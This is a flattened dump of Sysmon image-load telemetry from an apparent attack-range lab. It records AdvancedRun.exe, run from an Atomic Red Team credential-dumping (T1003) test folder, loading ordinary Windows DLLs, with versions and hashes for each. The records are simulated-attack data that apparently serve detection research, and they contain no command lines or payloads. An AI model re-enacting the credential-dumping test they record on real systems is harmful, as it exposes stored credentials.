Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003967192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 
(rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003967185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 
(rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003967178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile 
Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003967168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.223{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 
(rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003967161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.207{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003967152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.191{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
